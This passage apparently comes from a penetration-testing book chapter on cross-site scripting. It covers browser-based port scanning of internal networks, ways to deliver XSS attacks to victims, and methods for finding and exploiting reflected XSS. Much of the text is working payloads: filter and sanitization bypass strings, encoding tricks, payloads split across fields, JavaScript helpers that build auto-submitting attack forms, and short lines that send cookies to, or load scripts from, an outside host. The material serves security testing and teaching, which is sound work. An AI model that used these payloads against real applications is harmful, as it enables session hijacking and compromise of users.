used to test for network connectivity. Here, the attacker’s script attempts to

dynamically load and execute a script from each targeted host and port. If a

web server is running on that port, it will return HTML or some other content,

resulting in a JavaScript console error that the port scanning script can detect.

Otherwise, the connection attempt will time out or return no data, in which

case no error is thrown. Hence, despite the same origin restrictions, the port-

scanning script can confirm connectivity to arbitrary hosts and ports.
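
The step of inferring the local IP range can be sketched as follows. The function name is hypothetical, and the sketch assumes that the local network is a /24 (a 255.255.255.0 netmask), which is common on home networks but is by no means guaranteed.

```javascript
// Given the client's IPv4 address, lists the other host addresses to probe,
// assuming (hypothetically) that the local network is a /24.
function candidateHosts(clientIp) {
  if (!/^\d{1,3}(\.\d{1,3}){3}$/.test(clientIp)) {
    throw new Error("not an IPv4 address: " + clientIp);
  }
  const octets = clientIp.split(".").map(Number);
  if (octets.some((o) => o > 255)) {
    throw new Error("octet out of range: " + clientIp);
  }
  const prefix = octets.slice(0, 3).join(".");
  const hosts = [];
  for (let h = 1; h <= 254; h++) {
    hosts.push(prefix + "." + h);
  }
  return hosts;
}

const targets = candidateHosts("192.168.1.37");
console.log(targets.length, targets[0], targets[targets.length - 1]);
```

Each address in the resulting list would then be combined with a set of ports of interest and probed using the script-loading technique just described.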

Attack Other Network Hosts

Following a successful port scan to identify other hosts, a malicious script can

attempt to fingerprint each discovered service and then attack it in various

ways. Many web servers contain image files located at unique URLs. The fol-

lowing code checks for a specific image associated with a popular range of

DSL routers:

If the function notNetgear is not invoked, then the server has been success-

fully fingerprinted. The script can then proceed to attack the web server, either

by exploiting any known vulnerabilities in the particular software, or by per-

forming a request forgery attack (described later in this chapter). In this exam-

ple, the attacker could attempt to reconfigure the router to open up additional

ports on its external interface, or expose its administrative function to the

world. Note that many highly effective attacks of this kind only require the

ability to issue arbitrary requests, not to process their responses, and so are not

affected by the browser’s same origin policy.

In certain situations, an attacker may be able to leverage anti-DNS pinning

techniques to violate the same origin policy and actually retrieve content from

web servers on the local network. These attacks are described later in this

chapter.

Going beyond attacks against web servers, Wade Alcorn has performed

some interesting research demonstrating the possibilities for attacking other

network services via a hijacked browser. See the following paper for more

details:

www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf

Exploit Browser Vulnerabilities

If bugs exist within the user’s browser or any installed plug-ins, an attacker

may be able to exploit these via malicious JavaScript or HTML. In some cases,

bugs within plug-ins such as the Java VM have enabled attackers to perform

two-way binary communication with non-HTTP services on the local com-

puter or elsewhere, enabling the attacker to exploit vulnerabilities that exist

within other services identified via port scanning. Many software products

(including non–browser-based products) install ActiveX controls that may

contain vulnerabilities.

Delivery Mechanisms for XSS Attacks

Having identified an XSS vulnerability and formulated a suitable payload to

exploit it, an attacker needs to find some means of delivering the attack to

other users of the application. We have already discussed several ways in

which this can be done. In fact, there are many other delivery mechanisms

available to an attacker.

Delivering Reflected and DOM-Based XSS Attacks

In addition to the obvious phishing vector of bulk emailing a crafted URL to

random users, an attacker may attempt to deliver a reflected or DOM-based

XSS attack via the following mechanisms:

■■

In a targeted attack, a forged email may be sent to a single target user,

or a small number of users. For example, an application administrator

could be sent an email apparently originating from a known user, com-

plaining that a specific URL is causing an error. When an attacker wants

to compromise the session of a specific user (rather than harvest those

of random users) a well-informed and convincing targeted attack is

often the most effective delivery mechanism.

■■

A URL can be fed to a target user in an instant message.

■■

Content and code on third-party web sites can be used to generate

requests that trigger XSS flaws. For example,

wahh-innocuous.com

might contain interesting content as an inducement for users to visit,

but it may also contain scripts that cause the user’s browser to make

requests containing XSS payloads to a vulnerable application. If a user

is logged in to the vulnerable application, and happens to browse

wahh-innocuous.com, then the user’s session with the vulnerable application

will be compromised.

Having created a suitable web site, an attacker may use search engine

manipulation techniques to generate visits from suitable users — for

example, by placing relevant keywords within the site content and link-

ing to the site using relevant expressions. This delivery mechanism has

nothing to do with phishing, however — the attacker’s site does not

attempt to impersonate the site that it is targeting.

Note that this delivery mechanism can enable an attacker to exploit

reflected and DOM-based XSS vulnerabilities that can be triggered only

via

POST requests. With these vulnerabilities, there is obviously not a

simple URL that can be fed to a victim user to deliver an attack. How-

ever, a malicious web site may contain an HTML form that uses the

POST method and has the vulnerable application as its target URL.

JavaScript or navigational controls on the page can be used to submit

the form, successfully exploiting the vulnerability.

■■

In a variation on the third-party web site attack, some attackers have

been known to pay for banner advertisements that link to a URL con-

taining an XSS payload for a vulnerable application. If a user is logged

in to the vulnerable application, and clicks on the ad, then her session

with that application is compromised. Because many providers use

keywords to assign advertisements to pages that are related to them,

cases have even arisen where an ad attacking a particular application is

assigned to the pages of that application itself! This not only lends cred-

ibility to the attack but also guarantees that someone who clicks on the

ad is using the vulnerable application at the moment the attack strikes.

Further, because many banner ad providers charge on a per-click basis,

this technique effectively enables an attacker to “buy” a specific num-

ber of user sessions.

■■

Many web applications implement a function to “tell a friend” or send

feedback to site administrators. This function often enables a user to

generate an email with arbitrary content and recipients. An attacker

may be able to leverage this functionality to deliver an XSS attack via

an email that actually originates from the organization’s own server,

increasing the likelihood that even technically knowledgeable users and

anti-malware software will accept it.
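
The POST-based delivery described in the list above can be sketched as a small generator for the attacker's page. This is only an illustration under stated assumptions: the helper names, the form id f, and the example target (error.php with a message parameter on wahh-app.com) are hypothetical and are not taken from any real application.

```javascript
// Escape a value for use inside a double-quoted HTML attribute.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Build a page whose hidden form POSTs the given fields to targetUrl
// as soon as the page loads (hypothetical helper).
function buildAutoSubmitPage(targetUrl, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `<input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n");
  return [
    `<form id="f" method="POST" action="${escapeAttr(targetUrl)}">`,
    inputs,
    `</form>`,
    `<script>document.getElementById("f").submit();</script>`,
  ].join("\n");
}

// Assumed example: a reflected XSS flaw reachable only via POST.
const page = buildAutoSubmitPage("https://wahh-app.com/error.php", {
  message: "<script>alert(document.cookie)</script>",
});
console.log(page);
```

The payload is HTML-encoded only within the attacker's own page. The victim's browser decodes the attribute value and submits the raw payload in the body of the POST request.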

Delivering Stored XSS Attacks

There are two kinds of delivery mechanisms for stored XSS attacks: in-band

and out-of-band.

In-band delivery applies in most cases and is used when the data that is the

subject of the vulnerability is supplied to the application via its main web

interface. Common locations where user-controllable data may eventually be

displayed to other users include:

■■

Personal information fields — name, address, email, telephone, and

the like.

■■

Names of documents, uploaded files, and other items.

■■

Feedback or questions to application administrators.

■■

Messages, comments, questions, and the like to other application users.

■■

Anything that is recorded in application logs and displayed in-browser to

administrators, such as URLs, usernames, HTTP

Referer, User-Agent,

and the like.

In these cases, the XSS payload is delivered simply by submitting it to the

relevant page within the application and then waiting for victims to view the

malicious data.

Out-of-band delivery applies in cases where the data that is the subject of

the vulnerability is supplied to the application through some other channel.

The application receives data via this channel and ultimately renders it within

HTML pages that are generated within its main web interface. An example of

this delivery mechanism is the attack already described against web mail

applications, which involves sending malicious data to an SMTP server, which

is eventually displayed to users within an HTML-formatted email message.

Finding and Exploiting XSS Vulnerabilities

A basic approach to identifying XSS vulnerabilities is to use a standard proof-

of-concept attack string such as the following:

"><script>alert(document.cookie)</script>

This string is submitted as every parameter to every page of the application,

and responses are monitored for the appearance of this same string. If cases are

found where the attack string appears unmodified within the response, then

the application is almost certainly vulnerable to XSS.

If your intention is simply to identify some instance of XSS within the application

as quickly as possible in order to launch an attack against other application

users, then this basic approach is probably the most effective, because it can be

highly automated and produces minimal false positives. However, if your objec-

tive is to perform a comprehensive test of the application, designed to locate as

many individual vulnerabilities as possible, then the basic approach needs to be

supplemented with more sophisticated techniques. There are several different

ways in which XSS vulnerabilities may exist within an application that will not

be identified via the basic approach to detection:

■■

Many applications implement rudimentary blacklist-based filters in an

attempt to prevent XSS attacks. These filters typically look for expressions

like <script> and take some defensive

action such as removing or encoding the expression, or blocking the

request altogether. The attack strings commonly employed in the basic

approach to detection will often be blocked by these filters. However,

just because one common attack string is being filtered, this does not

demonstrate that an exploitable vulnerability does not exist. As you

will see, there are cases in which a working XSS exploit can be created

without using <script> tags, and even without using characters like

" < > and /.

■■

The anti-XSS filters implemented within many applications are defec-

tive and can be circumvented through various means. For example,

suppose that an application strips any <script> tags from user input

before it is processed. This means that the attack string used in the basic

approach will not be returned in any of the application’s responses.

However, it may be that one or more of the following strings will

bypass the filter, and result in a successful XSS exploit:

"><script >alert(document.cookie)</script >

"><ScRiPt>alert(document.cookie)</ScRiPt>

"%3e%3cscript%3ealert(document.cookie)%3c/script%3e

"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%00"><script>alert(document.cookie)</script>

Note that in some of these cases, the input string may be sanitized, decoded,

or otherwise modified before being returned in the server’s response, and yet

might still be sufficient for an XSS exploit. In this situation, no detection

approach based upon submitting a specific string and checking for its appear-

ance in the server’s response will in itself succeed in finding the vulnerability.
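
To see why a defective filter of this kind fails, it can help to model it. The following is a minimal sketch, assuming a hypothetical filter that removes the exact lowercase strings <script> and </script> in a single pass; real filters vary, and the function names here are invented for illustration.

```javascript
// Hypothetical defective filter: removes the exact, lowercase strings
// "<script>" and "</script>" in a single, non-recursive pass.
function naiveFilter(input) {
  return input.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// True if the text still contains an opening script tag of the kind a
// browser would accept (any case, optional whitespace before ">").
function hasScriptTag(text) {
  return /<script\s*>/i.test(text);
}

const candidates = [
  '"><script>alert(document.cookie)</script>',
  '"><script >alert(document.cookie)</script >',
  '"><ScRiPt>alert(document.cookie)</ScRiPt>',
  '"><scr<script>ipt>alert(document.cookie)</scr</script>ipt>',
];

for (const candidate of candidates) {
  const output = naiveFilter(candidate);
  console.log(hasScriptTag(output) ? "bypass " : "blocked", JSON.stringify(output));
}
```

Only the first candidate is neutralized. The last one is not returned unmodified, yet the filter itself reassembles a working tag, which is why searching responses for the exact submitted string would miss it.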

In exploits of DOM-based XSS vulnerabilities, the attack payload is not nec-

essarily returned in the server’s response but is retained in the browser DOM

and accessed from there by client-side JavaScript. Again, in this situation, no

approach based upon submitting a specific string and checking for its appear-

ance in the server’s response will succeed in finding the vulnerability.

Finding and Exploiting Reflected XSS Vulnerabilities

The most reliable approach to detecting reflected XSS vulnerabilities begins in

a similar way to the basic approach described previously.

HACK STEPS

■ Choose a unique arbitrary string which does not appear anywhere within

the application and which contains only alphabetical characters and so is

unlikely to be affected by any XSS-specific filters. For example:

myxsstestdmqlwp

■ Submit this string as every parameter to every page, targeting only one

parameter at a time.

■ Monitor the application’s responses for any appearance of this same

string. Make a note of every parameter whose value is being copied into

the application’s response. These are not necessarily vulnerable, but

each instance identified is a candidate for further investigation, as

described in the next part of this section.

■ Note that both GET and POST requests need to be tested, and you should

include every parameter within both the URL query string and the mes-

sage body. While a smaller range of delivery mechanisms exists for XSS

vulnerabilities that can only be triggered via a POST request, exploitation

is still possible, as previously described.

■ In addition to the standard request parameters, you should also test

every instance in which the contents of an HTTP request header are

processed by the application. A common XSS vulnerability arises in error

messages, where items such as the Referer and User-Agent headers

are copied into the contents of the message. These headers are valid

vehicles for delivering a reflected XSS attack, because an attacker can use

a Flash object to induce a victim to issue a request containing arbitrary

HTTP headers.
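
The first three steps lend themselves to automation. The following is a rough sketch rather than a complete tool: it covers only URL query string parameters (message bodies and request headers need the same treatment), and the function names are hypothetical.

```javascript
const MARKER = "myxsstestdmqlwp"; // the unique string from the steps above

// For a URL with query parameters, return one test URL per parameter,
// each replacing only that parameter's value with the marker.
function buildProbeUrls(url, marker = MARKER) {
  const base = new URL(url);
  const names = [...new Set(base.searchParams.keys())];
  return names.map((name) => {
    const probe = new URL(base.href);
    probe.searchParams.set(name, marker);
    return { param: name, url: probe.href };
  });
}

// Report every offset at which the marker is echoed in a response body.
function findReflections(body, marker = MARKER) {
  const offsets = [];
  let i = body.indexOf(marker);
  while (i !== -1) {
    offsets.push(i);
    i = body.indexOf(marker, i + marker.length);
  }
  return offsets;
}

console.log(buildProbeUrls(
  "https://wahh-app.com/account.php?page_id=244&seed=129402931&mode=normal"
));
```

Each offset returned by findReflections is a separate candidate for manual investigation, because the same parameter may be echoed into several different contexts within one page.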

Each potential vulnerability you have noted needs to be manually investi-

gated to verify whether it is actually exploitable. Your objective here is to find

a way of crafting your input such that, when it is copied into the same location

in the application’s response, it will result in execution of arbitrary JavaScript.

Let’s look at some examples of this.

Example 1

Suppose that the returned page contains the following:

<input type="text" name="address1" value="myxsstestdmqlwp">

One obvious way to craft an XSS exploit is to terminate the double quotation

marks that are enclosing your string, close the

<input> tag, and then employ

some means of introducing JavaScript (using <script>, <img src='javascript:...'>,

etc.). For example:

"><script>alert(document.cookie)</script><!--

An alternative method in this situation, which may bypass certain input fil-

ters, is to remain within the

<input> tag itself but inject an event handler con-

taining JavaScript. For example:

" onfocus="alert(document.cookie)

Example 2

Suppose that the returned page contains the following:

<script>var a = 'myxsstestdmqlwp'; var b = 123; ... </script>

Here, the string you control is being inserted directly into an existing script.

To craft an exploit, you can terminate the single quotation marks around your

string, terminate the statement with a semicolon, and then proceed directly to

your desired JavaScript. For example:

'; alert(document.cookie); var foo='

Note that because you have terminated a quoted string, to prevent errors

occurring within the JavaScript interpreter it is necessary to ensure that the

script continues gracefully with valid syntax after your injected code. In this

example, the variable

foo is declared, and a second quoted string is opened,

which will be terminated by the code that immediately follows your string.

Another method that is often effective is to end your input with

// to comment

out the remainder of the line.
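
The effect of both variants can be checked outside a browser. The following is a minimal sketch, assuming a hypothetical server-side template that copies input into a single-quoted string; alert and document are replaced by stand-ins so that the resulting script can be run safely.

```javascript
// Hypothetical server-side template: user input is copied into a
// single-quoted JavaScript string without any escaping.
function renderScript(input) {
  return "var a = '" + input + "'; var b = 123;";
}

// Run a script body with stand-ins for the browser's alert and document,
// and return the values that were passed to alert.
function runWithFakeBrowser(scriptBody) {
  const alerts = [];
  const fakeDocument = { cookie: "sessid=abc123" };
  new Function("alert", "document", scriptBody)((msg) => alerts.push(msg), fakeDocument);
  return alerts;
}

const payload = "'; alert(document.cookie); var foo='";
console.log(renderScript(payload));
console.log(runWithFakeBrowser(renderScript(payload)));

// The variant that comments out the remainder of the line.
console.log(runWithFakeBrowser(renderScript("'; alert(document.cookie);//")));
```

In both cases the script remains syntactically valid after the injected code, which is the condition the preceding paragraph describes.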

Example 3

Suppose that the returned page contains the following:

<img src="myxsstestdmqlwp">

Here, the string you control is being inserted into the src attribute of an <img>

tag. On some browsers, this attribute may contain a URL that uses the

javascript: protocol, allowing the following straightforward exploit to be used:

javascript:alert(document.cookie);

For an attack that works against all current browsers, you can use an invalid

image name together with an

onerror event handler:

" onerror="alert(document.cookie)

TIP As with other attacks, be sure to URL-encode any special characters that

have a significance within the request, including & = + ; and space.

Other Entry Points for JavaScript

In addition to the common examples just illustrated, there are numerous other

possible entry points for XSS attacks, arising from the complexities of the

HTML language. Many of these examples are affected by anomalies in the way

different browser platforms and versions handle unusual HTML. For example:

■■

On Internet Explorer, many tags will accept a style attribute containing

JavaScript in an

expression string. For example:

style=x:expression(alert(document.cookie))

■■

In Firefox, if you control the content attribute of a refresh meta tag, you

can inject a URL that uses the

javascript: protocol (as well as doing

arbitrary redirects). For example:

<meta http-equiv=refresh content=0;url=javascript:alert(document.cookie);>

If you encounter any unusual situations that you are unfamiliar with, we

recommend that you consult the excellent XSS Cheat Sheet maintained by

RSnake, located here:

http://ha.ckers.org/xss.html

HACK STEPS

For each potential XSS vulnerability noted in the previous steps:

■ Review the HTML source to identify the location(s) of your unique string.

■ If the string appears more than once, then each occurrence needs to be

treated as a separate potential vulnerability and investigated individually.

■ Determine, from the location within the HTML of the user-controllable

string, how you need to modify it in order to cause execution of arbitrary

JavaScript. Typically, numerous different methods will be potential vehi-

cles for an attack.

■ Attempt to use the various injection vectors described, and consult the

XSS Cheat Sheet at http://ha.ckers.org/xss.html to identify addi-

tional unusual vectors.

■ Test your exploit by submitting it to the application. If your crafted string

is still returned unmodified, then the application is vulnerable. Double-

check that your syntax is correct by using a proof-of-concept script to

display an alert dialog, and confirm that this actually appears in your

browser when the response is rendered.

Very often, you will discover that your initial attempted exploits do not

actually get returned unmodified by the server, and so do not succeed in exe-

cuting your JavaScript. If this happens, do not give up! Your next task is to

determine what server-side processing is occurring that is affecting your

input. There are three broad possibilities:

■■

The application has identified an attack signature and has blocked your

input altogether.

■■

The application has accepted your input but has performed some kind

of sanitization or encoding on the attack string.

■■

The application has truncated your attack string to a fixed maximum

length.

We will look at each scenario in turn and discuss various ways in which the

obstacles presented by the application’s processing can be bypassed.

Beating Signature-Based Filters

In the first type of filter, the application will typically respond to your attack

string with an entirely different response than it did for the harmless string —

for example, with an error message, possibly even stating that a possible XSS

attack was detected, as shown in Figure 12-9.

Figure 12-9: An error message generated by ASP.NET’s anti-XSS filters

If this occurs, then the next step is to determine what characters or expres-

sions within your input are triggering the filter. An effective approach is to

remove different parts of your string in turn and see whether the input is still

being blocked. Typically, this process establishes fairly quickly that a specific

expression such as <script> is causing the request to be blocked. If this is the

case, then you need to test the filter to establish whether any bypasses exist.

The bypasses that are commonly found in real-world XSS filters include the

following:

■■

Many filters match specific tags, including the opening and closing

angle brackets. However, most browsers tolerate whitespace before the

closing bracket, which allows an easy bypass of the filter. For example:

<script >

■■

Because many people write HTML in lowercase, some filters check for

only the usual lowercase version of malicious tags. These filters can be

bypassed by varying the case. For example:

<ScRiPt>

■■

Some filters match any pair of opening and closing angle brackets, with

any content in between. Even if you have no alternative but to inject a

new tag, it is often possible to bypass this filter by relying upon the

existing surrounding syntax to close your injected tag for you. For

example, if you control the value of the

value attribute here:

<input type="hidden" name="pageid" value="foo">

then you can use input like the following, which is not blocked by the

filter, to inject a new tag containing JavaScript:

foo"><x style="x:expression(alert(document.cookie))

A further trick you can use against this kind of filter is to exploit the fact

that in many contexts browsers tolerate unclosed HTML tags. The fol-

lowing is invalid HTML, and yet the injected JavaScript is still exe-

cuted:

<img src="" onerror=alert(document.cookie)

■■

Some filters match pairs of opening and closing angle brackets, extract

the contents, and compare this to a blacklist of tag names. In this situa-

tion, you may be able to bypass the filter by using superfluous brackets,

which are tolerated by the browser. For example:

<<script>alert(document.cookie);//<</script>

■■

Some filters stop processing a string when they encounter a null byte,

even though the text following the null byte is still returned in the

application’s response. These filters can be bypassed by inserting a

URL-encoded null byte before the filtered expression. For example:

foo%00<script>

■■

Depending on the target browser, you can often insert characters into a

filtered expression that will bypass the filter and yet be tolerated by the

browser. For example:

<script/src=...

<scr%00ipt>

expr/****/ession

■■

If user-supplied data is (further) canonicalized after the filter is applied,

then it may be possible to bypass the filter and still exploit the vulnera-

bility, by URL-encoding or double-encoding the filtered expression. For

example:

%3cscript%3e

%253cscript%253e

■■

A particular case of the generic canonicalization bypass arises in relation

to XSS, because attack payloads returned in responses may be decoded

by the victim’s browser, after all input validation performed by the

server has been completed. In certain situations, you can HTML-encode

your attack payload to defeat the server’s input validation, and the vic-

tim’s browser will decode your payload again for you. For example, the

expression

javascript: is often blocked to defeat attacks using this

protocol. However, the expression can be HTML-encoded in various

ways that are tolerated by many browsers. For example:

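<img src=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58; ...

<img src=&#0000106;&#0000097;&#0000118;&#0000097;&#0000115;&#0000099;&#0000114;&#0000105;&#0000112;&#0000116;&#0000058; ...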

<img src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A ...

These examples respectively use standard UTF-8 encoding, standard

encoding with superfluous padding, and encoding in hexadecimal with

semicolons omitted. The various possible permutations of the different

encoding types are of course very large.
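
The three HTML encodings just described can be generated mechanically. The following helpers are a hypothetical sketch (the names and the padding width of 7 digits are assumptions); they encode every character of the expression, although in practice encoding only some characters may be enough to defeat a filter.

```javascript
// Encode every character as a decimal character reference, e.g. "j" -> "&#106;".
// A padTo value greater than 0 left-pads each number with superfluous zeros.
function toDecimalEntities(text, padTo = 0) {
  return [...text]
    .map((ch) => "&#" + String(ch.codePointAt(0)).padStart(padTo, "0") + ";")
    .join("");
}

// Encode every character as a hexadecimal reference with the trailing
// semicolon omitted, e.g. "j" -> "&#x6A".
function toHexEntitiesNoSemicolon(text) {
  return [...text]
    .map((ch) => "&#x" + ch.codePointAt(0).toString(16).toUpperCase())
    .join("");
}

const blocked = "javascript:";
console.log(toDecimalEntities(blocked));
console.log(toDecimalEntities(blocked, 7));
console.log(toHexEntitiesNoSemicolon(blocked));
```

Whether a given browser decodes each form inside a particular attribute is something you need to confirm by testing against the browsers you are targeting.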

TIP In some cases, you may succeed in being able to execute some JavaScript

but face restrictions on the commands and keywords that you can employ in

your code. In this situation, the application’s filters can often be bypassed by

building and executing statements dynamically. For example, if the application

blocks any user-supplied data containing the expression document.cookie,

then this can be trivially bypassed using

var a = "alert(doc" + "ument.coo" + "kie)"; eval(a);

or even

var a = "alert(" + String.fromCharCode(100,111,99,117,109,101,110,

116,46,99,111,111,107,105,101) + ")"; eval(a);
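
Writing out character codes by hand is error-prone, so a small helper is useful when preparing payloads of this kind. The following is a sketch only; the function name is hypothetical.

```javascript
// Turn a string into a String.fromCharCode(...) expression that rebuilds it
// at run time, so the literal text never appears in the payload.
function toFromCharCode(text) {
  const codes = [];
  for (let i = 0; i < text.length; i++) {
    codes.push(text.charCodeAt(i));
  }
  return "String.fromCharCode(" + codes.join(",") + ")";
}

const encoded = toFromCharCode("document.cookie");
console.log(encoded);
```

The generated expression contains no quotation marks, which also makes it suitable for situations in which quotation marks are being escaped or blocked.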

Beating Sanitization

Of all the obstacles that you may encounter when attempting to exploit poten-

tial XSS conditions, this is probably the most common. Here, the application

performs some kind of sanitization or encoding on your attack string which

renders it harmless, preventing it from causing the execution of JavaScript.

The most prevalent manifestation of data sanitization occurs when the

application HTML-encodes certain key characters that are necessary to deliver

an attack (so

< becomes &lt; and > becomes &gt;). In other cases, the application

may remove altogether certain characters or expressions, in an attempt to

cleanse your input of malicious content.

When this defense is encountered, the first step is to determine precisely

which characters and expressions are being sanitized, and whether it is still

possible to carry out an attack with the remaining characters. For example, if

your data is being inserted directly into an existing script, you may not need to

employ any HTML tag characters. If it appears impossible to perform an attack

without using input that is being sanitized, then you need to test the effective-

ness of the sanitizing filter to establish whether any bypasses exist. Here are

some examples of common bypasses:

■■

If the filter removes certain expressions altogether, and at least one of

the removed expressions is more than one character in length, then it

may be possible to smuggle that expression past the filter, provided that

the sanitization is not applied recursively. For example:

<scr<script>ipt>

■■

As previously described for signature-based filters, it may be possible

to bypass a sanitizing filter by encoding filtered expressions or by

inserting a null byte before them.

■■

When you are injecting into a quoted string in an existing script, it is

common to find that the application places the backslash character

before any quotation mark characters that you inject. This escapes your

quotation marks, preventing you from terminating the string and inject-

ing arbitrary script. In this situation, you should always verify whether

the backslash character itself is being escaped. If not, then a simple filter

bypass is possible. For example, if you control the value

foo in

var a = 'foo';

then you can inject

foo\'; alert(document.cookie);//

This results in the following response, in which you now control the

script. Note the use of the JavaScript comment character

// to comment

out the remainder of the line, thus preventing a syntax error caused by

the application’s own string delimiter:

var a = 'foo\\'; alert(document.cookie);//';

■■

In the preceding example, if you find that the backslash character is also

being properly escaped, but that angle brackets are returned unsani-

tized, then you can use the following attack:

</script><script>alert(document.cookie)</script>

This effectively abandons the application’s original script and injects a

new one immediately after it. The attack works because browsers’ pars-

ing of HTML tags takes precedence over their parsing of embedded

JavaScript:

<script>var a = '</script><script>alert(document.cookie)</script>';</script>

Although the original script now contains an error, this does not matter

because the browser moves on and executes your injected script

regardless of the error in the original script.

■■

In the previous two attacks, where you are able to take control of a

script but are prevented from using either single or double quotation

marks because these are being escaped, you can use the

String.fromCharCode trick to construct strings without the need for delimiters.
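
The backslash bypass described in the list above is easy to get wrong by one character, so it is worth modeling. The following is a minimal sketch, assuming a hypothetical sanitizer that escapes single quotes only, with a stricter variant shown for contrast; alert and document are stand-ins so that the generated script can be run safely.

```javascript
// Defective sanitizer (hypothetical): escapes single quotes only.
function escapeQuotesOnly(input) {
  return input.replace(/'/g, "\\'");
}

// Stricter variant for contrast: escapes backslashes first, then quotes.
function escapeBackslashesAndQuotes(input) {
  return input.replace(/\\/g, "\\\\").replace(/'/g, "\\'");
}

// Hypothetical template that embeds the escaped input in a quoted string.
function renderScript(input, escape) {
  return "var a = '" + escape(input) + "';";
}

// Run a script body with stand-ins for alert and document, and return
// the values that were passed to alert.
function runWithFakeBrowser(scriptBody) {
  const alerts = [];
  const fakeDocument = { cookie: "sessid=abc123" };
  new Function("alert", "document", scriptBody)((msg) => alerts.push(msg), fakeDocument);
  return alerts;
}

// The input from the text: foo\'; alert(document.cookie);//
const payload = "foo\\'; alert(document.cookie);//";

console.log(renderScript(payload, escapeQuotesOnly));
console.log(runWithFakeBrowser(renderScript(payload, escapeQuotesOnly)).length);
console.log(runWithFakeBrowser(renderScript(payload, escapeBackslashesAndQuotes)).length);
```

With the defective sanitizer, the injected backslash escapes the backslash that the application adds, so the quotation mark terminates the string and the injected statement runs. With the stricter variant, the whole input stays inside the string.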

TIP In several of the filter bypasses described, the attack results in HTML that

is malformed but is nevertheless tolerated by the client browser. Because

numerous quite legitimate web sites contain HTML that does not strictly comply

with the standards, browsers accept HTML that is deviant in all kinds of ways, and

effectively fix up the errors behind the scenes, before the page is rendered.

Often, when you are trying to fine-tune an attack in an unusual situation, it can

be helpful to view the virtual HTML that the browser constructs out of the

server’s actual response. In Firefox, you can use the WebDeveloper tool, which

contains a View Generated Source function that performs precisely this task.

Beating Length Limits

When the application truncates your input to a fixed maximum length, there

are three possible approaches to creating a working exploit.

The first, rather obvious, method is to attempt to shorten your attack pay-

load by using JavaScript APIs with the shortest possible length and removing

characters which are usually included but strictly unnecessary. For example, if

you are injecting into an existing script, the following 28-byte command will

transmit the user’s cookies to the server with hostname a:

open("//a/"+document.cookie)

Alternatively, if you are injecting straight into HTML, the following 30-byte

tag will load and execute a script from the server with hostname a:

<script src=http://a></script>

On the Internet, these examples would obviously need to be expanded to

contain a valid domain name or IP address. However, on an internal corporate

network, it may actually be possible to use a machine with the WINS name a

to host the recipient server.

TIP You can use Dean Edwards’s JavaScript packer to shrink a given script as

far as possible by eliminating unnecessary whitespace. This utility also converts

scripts to a single line, for easy insertion into a request parameter:

http://dean.edwards.name/packer/

The second, potentially more powerful, technique for beating length limits

is to span an attack payload across multiple different locations where user-

controllable input is inserted into the same returned page. For example, con-

sider the following URL:

https://wahh-app.com/account.php?page_id=244&seed=129402931&mode=normal

which returns a page containing the following:

<input type="hidden" name="page_id" value="244">

<input type="hidden" name="seed" value="129402931">

<input type="hidden" name="mode" value="normal">

Suppose that there are length restrictions on each of the fields, such that no

feasible attack string can be inserted into any of them. Nevertheless, you can

still deliver a working exploit, by using the following URL to span a script

across the three locations that you control:

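https://wahh-app.com/account.php?page_id="><script>/*&seed=*/alert(document.cookie);/*&mode=*/</script>

When the parameter values from this URL are embedded into the page, the

result is the following:

<input type="hidden" name="page_id" value=""><script>/*">

<input type="hidden" name="seed" value="*/alert(document.cookie);/*">

<input type="hidden" name="mode" value="*/</script>">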

The resulting HTML is entirely valid and is equivalent to only the portions

highlighted in bold. The chunks of source code in between have effectively

become JavaScript comments (surrounded by the

/* and */ markers) and so

are ignored by the browser. Hence, your script is executed just as if it had been

inserted whole at one location within the page.
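
The spanning technique can be verified by rendering the page and stripping the comments. The following is a sketch under stated assumptions: the template, which copies each parameter unescaped into the value attribute of a hidden field, and all function names are hypothetical.

```javascript
// Hypothetical page template: each parameter is copied, unescaped, into the
// value attribute of its own hidden field.
function renderPage(params) {
  return ["page_id", "seed", "mode"]
    .map((name) => `<input type="hidden" name="${name}" value="${params[name]}">`)
    .join("\n");
}

// Extract what a browser would treat as the body of the first script element.
function firstScriptBody(html) {
  const match = /<script>([\s\S]*?)<\/script>/.exec(html);
  return match ? match[1] : null;
}

// Remove /* ... */ comments to show what is left for the interpreter.
function stripBlockComments(js) {
  return js.replace(/\/\*[\s\S]*?\*\//g, "");
}

const html = renderPage({
  page_id: '"><script>/*',
  seed: "*/alert(document.cookie);/*",
  mode: "*/</script>",
});
console.log(html);
console.log(stripBlockComments(firstScriptBody(html)));
```

Once the comments are removed, the only code remaining between the script tags is the statement carried in the seed parameter.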

TIP The technique of spanning an attack payload across multiple fields can

sometimes be used to beat other types of defensive filters. It is fairly common to

find different data validation and sanitization being implemented on different

fields within a single page of an application. In the previous example, suppose

that the page_id and mode parameters are subject to a maximum length of 12

characters. Because these fields are so short, the application’s developers did

not bother to implement any XSS filters. The seed parameter, on the other

hand, is unrestricted in length, and so rigorous filters were implemented to

prevent the injection of the characters ", <, or >. In this scenario, despite the

developers’ efforts, it is still possible to insert an arbitrarily long script into the

seed parameter without employing any of the blocked characters, because the

JavaScript context can be created by data injected into the surrounding fields.

A third technique for beating length limits, which can be highly effective in

some situations, is to “convert” a reflected XSS flaw into a DOM-based vul-

nerability. For example, in the original reflected XSS vulnerability, if the appli-

cation places a length restriction on the

message parameter that is copied into

the returned page, you can inject the following 46-byte script, which evaluates

the fragment string in the current URL:

<script>eval(location.hash.substr(1))</script>

By injecting this script into the parameter that is vulnerable to reflected XSS,

you can effectively induce a DOM-based XSS vulnerability in the resulting

page and thus execute a second script located within the fragment string,

which is outside the control of the application’s filters and may be arbitrarily

long. For example:

https://wahh-app.com/error.php?message=<script>eval(location.hash.substr(1))</script>#alert('long script here ......')

Modifying the Request Method

In complex applications that employ a large number of forms, it is common to

find several reflected XSS vulnerabilities within

POST requests, where the vul-

nerable parameter is submitted within the body of an HTTP message. In these

cases, it is always worth verifying whether the application handles the request

in the same way if it is converted to a

GET request. Most applications will tol-

erate requests in either form.

To perform this check, simply change the method of your crafted request

from

